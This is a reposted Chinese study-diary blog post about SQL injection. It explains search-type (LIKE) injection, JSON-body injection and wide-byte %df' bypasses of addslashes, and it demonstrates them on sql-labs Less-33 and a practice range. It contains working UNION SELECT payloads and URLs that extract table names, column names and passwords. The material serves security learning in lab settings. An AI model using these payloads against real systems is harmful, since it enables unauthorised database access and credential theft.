欢迎来到尧图网

客户服务 关于我们

您的位置:首页 > 教育 > 锐评 > 日记学习小迪安全27

日记学习小迪安全27

2024/11/29 21:41:37 来源:https://blog.csdn.net/m0_74741186/article/details/142708765  浏览:    关键词:日记学习小迪安全27

感觉复制粘贴没有意思,而且还有点浪费时间,主要是学习,不是复制,那就复制别人的吧

第27关就参考这篇文章吧,以下大部分内容都是参考以下文章(侵权删除)

第27天:WEB攻防-通用漏洞&SQL注入&Tamper脚本&Base64&Json&md5等 - 解放者-cracer - 博客园 (cnblogs.com)

sql注入类型

目录

搜索型

json型

宽字节注入


如果没有实战,那我就多思考一下吧,这个小迪的课都还没搞明白,你去搞其他的,浪费时间啊,这个不就是三分钟热度吗,对学习小迪安全这件事情,吧这个课搞明白,再去搞其他的行不行,我记得小迪说过,学完这个课,可以达到红队初中级,蓝队中高级,真的假的,那就努力学,不要搞其他事情,浪费时间

第26关没有靶场,那个实验做不出来

这个应该都是php+mysql+apache

搜索型

SQL语句:$sql="select * from sy_guestbook where gName like '%$s%'";

这个和其他的语句是不一样的,因为这个的闭合方式是不一样的,也不知道搜索型都是这样的闭合方式,还是只有这一种是这样的,

闭合方式为%'  xxxxxx   --+,为百分号单引号闭合(如果这样闭合不了的话,那就试试and,使其成为对比条件,使其相等,就不会影响sql语句)

select * from sy_guestbook where gName like '%演示%' +UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 and '%'='%'

json型

json型  表现形式不一样,提交数据一样的
{“username”:"admin"}    键名和键值
取数据的时候,只会接收admin的值,不会接收双引号。数据表现形式
json:
{"username":"admin","password":"xiaodi"}
常规:
username=admin&password=xiaodi如何注入:
常规:username=admin and 1=1&password=xiaodi
json:{"username":"admin and 1=1","password":"xiaodi"}
json格式,参考:https://baike.baidu.com/item/JSON/2462549?fr=aladdinjson注入payload应该怎么构造呢?
这里使用到post提交json={"username":"admin' order by 3#"}查询用户和数据库名:
json={"username":"admin' and 1=2 union select 1,database(),user()#"}

json型注入,出现的地方,根据我的猜测,应该是出现在用户名和密码的那个地方,也就是登录的地方,因为一个键对应一个值,格式是这样的

宽字节注入

宽字节注入条件:
(1)数据库查询设置为GBK编码
(2)使用了addslashes(),mysql_real_escape_string(),mysql_escape_string()之类的函数

首先我们需要知道他是宽字节注入(小迪说的),所以我们先测试应该是这样测试的,%df',看是否报错

关于迪哥为什么加上and 1=-2,应该是让前面的式子不成立,执行后面的sql语句,我觉得可以直接在id=1,把1改成-1,前面搜索的结果为假,然后执行后面的aql语句

http://219.153.49.228:42692/new_list.php?id=1%df' and 1=-2 union select 1,2 3,4,5 --+

SQL注入接收数据,但是数据会出现/ \这种符号
转义函数:addslashes
\n 换行
\n 字符串,但是电脑以为你是换行
对字符串进行转义,\\n进行转义。%df就可以进行绕过,利用宽字节
原理:利用繁体字或者乱码,来进行占用两个字节。
\ 一个字节
� 两个字节
中文 两个字节
用到了addslashes函数后,再次进行注入的时候
注入payload:http://127.0.0.1:8081/web/news.php?gtpl=simple' order by 17--+
但是实际上的SQL语句执行时候:select * from sy_guestbook where gTpl='simple\' order by 17--+'
对'进行了转义,变成了\'

这里举例sql-lab的第33关来演示

由于单引号被转义了(第33关)
mysql_real_escape_string()函数会将SQL语句中使用的字符串中的特殊字符进行转义。这些特殊字符包括单引号('),双引号("),反斜杠(\)等。通过转义这些字符,可以防止恶意用户构造特殊的字符串来绕过SQL查询的限制,从而执行未授权的数据库操作。先获取表名(因为单引号被转义了,写成database())
http://sql-labs:8888/Less-33/?id=0%81%27%20union%20select%201,2,group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database() --+在获取列名(将user进行16进制编码,0x表示16进制的前缀)
http://sql-labs:8888/Less-33/?id=0%81%27%20union%20select%201,2,group_concat(column_name)%20from%20information_schema.columns%20where%20table_schema=database() and table_name=0x7573657273 --+在获取数据
http://sql-labs:8888/Less-33/?id=-1%df' union select 1,2,password from users --+

参考

json的几种标准格式_json格式-CSDN博客

宽字节注入-CSDN博客

版权声明:

本网仅为发布的内容提供存储空间,不对发表、转载的内容提供任何形式的保证。凡本网注明“来源:XXX网络”的作品,均转载自其它媒体,著作权归作者所有,商业转载请联系作者获得授权,非商业转载请注明出处。

我们尊重并感谢每一位作者,均已注明文章来源和作者。如因作品内容、版权或其它问题,请及时与我们联系,联系邮箱:809451989@qq.com,投稿邮箱:809451989@qq.com